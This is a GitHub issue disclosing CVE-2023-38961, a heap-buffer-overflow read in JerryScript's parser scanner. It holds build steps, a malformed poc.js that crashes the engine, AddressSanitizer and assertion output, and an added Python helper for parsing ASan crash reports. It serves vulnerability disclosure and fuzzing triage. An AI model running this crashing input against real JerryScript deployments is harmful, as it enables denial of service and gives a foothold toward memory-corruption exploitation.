CVE-2023-38961: heap-buffer-overflow in scanner_is_context_needed · Issue #5092 · jerryscript-project/jerryscript
Buffer Overflow vulnerability in JerryScript Project jerryscript v3.0.0 allows a remote attacker to execute arbitrary code via the scanner_is_context_needed component in js-scanner-util.c.
JerryScript revision
Commit: 05dbbd1
Version: v3.0.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test case (poc.js)

```js
async function n() {
return 1 ;
}
import {
nFromEvent as’’throw n ( ) undefined }
1
}
async function from async 1; }
async function a() {
var n = await 2 ;
return n ;
}
import { n };
return n;
}
var r = async function() {
var n = await 2; return n;
};
// poc.js import { nFromEvent as ‘’ }
```
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
=================================================================
==1326574==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf510071e at pc 0x56641307 bp 0xffa4ba68 sp 0xffa4ba58
READ of size 1 at 0xf510071e thread T0
#0 0x56641306 in scanner_is_context_needed ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2101
#1 0x56639a78 in parser_parse_source ./jerryscript/jerry-core/parser/js/js-parser.c:2267
#2 0x565cc3cf in jerry_parse_common ./jerryscript/jerry-core/api/jerryscript.c:412
#3 0x565cc631 in jerry_parse ./jerryscript/jerry-core/api/jerryscript.c:480
#4 0x566c1644 in jerryx_source_parse_script ./jerryscript/jerry-ext/util/sources.c:52
#5 0x566c1701 in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:63
#6 0x565c4d04 in main ./jerryscript/jerry-main/main-desktop.c:156
#7 0xf769fed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
#8 0x565c7fb4 in _start (./jerryscript/build/bin/jerry+0x12fb4)
0xf510071e is located 0 bytes to the right of 14-byte region [0xf5100710,0xf510071e)
allocated by thread T0 here:
#0 0xf7a88817 in __interceptor_malloc ../../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x565c7ae4 in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x5662cd8d in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291
#3 0x5663d2bd in scanner_malloc ./jerryscript/jerry-core/parser/js/js-scanner-util.c:93
#4 0x5663d33d in scanner_insert_info ./jerryscript/jerry-core/parser/js/js-scanner-util.c:183
#5 0x5663f35b in scanner_pop_literal_pool ./jerryscript/jerry-core/parser/js/js-scanner-util.c:949
#6 0x5664e18f in scanner_scan_all ./jerryscript/jerry-core/parser/js/js-scanner.c:3366
#7 0x5663913b in parser_parse_source ./jerryscript/jerry-core/parser/js/js-parser.c:2167
#8 0x565cc3cf in jerry_parse_common ./jerryscript/jerry-core/api/jerryscript.c:412
#9 0x565cc631 in jerry_parse ./jerryscript/jerry-core/api/jerryscript.c:480
#10 0x566c1644 in jerryx_source_parse_script ./jerryscript/jerry-ext/util/sources.c:52
#11 0x566c1701 in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:63
#12 0x565c4d04 in main ./jerryscript/jerry-main/main-desktop.c:156
#13 0xf769fed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
SUMMARY: AddressSanitizer: heap-buffer-overflow ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2101 in scanner_is_context_needed
==1326574==ABORTING
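As an added triage helper (not part of this report or of the JerryScript project), the following reduces the AddressSanitizer report above to the fields used to deduplicate and prioritise fuzzer crashes: bug class, access kind and size, the faulting frame, the size of the heap object and how far past its end the read landed, and the first non-sanitizer allocation frame. The regexes follow the standard ASan report layout; the embedded sample is a constructed, trimmed copy of the report shown above.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: key lines of the AddressSanitizer report above, trimmed to the parts that matter.
SAMPLE_REPORT = """\
==1326574==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf510071e at pc 0x56641307 bp 0xffa4ba68 sp 0xffa4ba58
READ of size 1 at 0xf510071e thread T0
    #0 0x56641306 in scanner_is_context_needed ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2101
    #1 0x56639a78 in parser_parse_source ./jerryscript/jerry-core/parser/js/js-parser.c:2267
0xf510071e is located 0 bytes to the right of 14-byte region [0xf5100710,0xf510071e)
allocated by thread T0 here:
    #0 0xf7a88817 in __interceptor_malloc ../../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
    #1 0x565c7ae4 in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254
    #3 0x5663d2bd in scanner_malloc ./jerryscript/jerry-core/parser/js/js-scanner-util.c:93
SUMMARY: AddressSanitizer: heap-buffer-overflow ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2101 in scanner_is_context_needed
"""

HEADER_RE = re.compile(r"ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-fA-F]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at", re.M)
REGION_RE = re.compile(r"is located (\d+) bytes to the (right|left) of (\d+)-byte region")
FRAME_RE = re.compile(r"#\d+\s+0x[0-9a-fA-F]+\s+in\s+(\S+)\s+(\S+)")

@dataclass
class AsanTriage:
    bug_type: str                 # e.g. heap-buffer-overflow
    access: str                   # READ or WRITE
    size: int                     # bytes accessed
    crash_frame: str              # frame #0 of the faulting access: "func file:line"
    region_size: Optional[int]    # size of the heap object, when ASan reports one
    offset_past_end: Optional[int]  # bytes to the right of the region, else None
    alloc_site: Optional[str]     # first allocation frame outside the sanitizer runtime

def parse_asan(report: str) -> AsanTriage:
    """Reduce an ASan access report to the fields a fuzzing triage needs."""
    head, access = HEADER_RE.search(report), ACCESS_RE.search(report)
    if not head or not access:
        raise ValueError("not an AddressSanitizer access report")
    # Split at the allocation stack so frames of the two stacks are not mixed up.
    access_part, _, alloc_part = report.partition("allocated by")
    access_frames = FRAME_RE.findall(access_part)
    alloc_frames = [f for f in FRAME_RE.findall(alloc_part)
                    if not f[0].startswith("__interceptor_") and "libsanitizer" not in f[1]]
    region = REGION_RE.search(report)
    return AsanTriage(
        bug_type=head.group(1), access=access.group(1), size=int(access.group(2)),
        crash_frame=" ".join(access_frames[0]),
        region_size=int(region.group(3)) if region else None,
        offset_past_end=int(region.group(1)) if region and region.group(2) == "right" else None,
        alloc_site=" ".join(alloc_frames[0]) if alloc_frames else None)

def crash_signature(t: AsanTriage) -> str:
    """Dedup key for a crash corpus: bug class, access kind and the faulting function."""
    return f"{t.bug_type}:{t.access}:{t.crash_frame.split()[0]}"
```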
Output with a debug build (--debug)
ICE: Assertion 'type == SCANNER_STREAM_TYPE_VAR || type == SCANNER_STREAM_TYPE_LET || type == SCANNER_STREAM_TYPE_CONST || type == SCANNER_STREAM_TYPE_FUNC || is_import' failed at ./jerryscript/jerry-core/parser/js/js-scanner-util.c(scanner_is_context_needed):2080.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
Credits: @Ye0nny, @EJueon of the seclab-yonsei.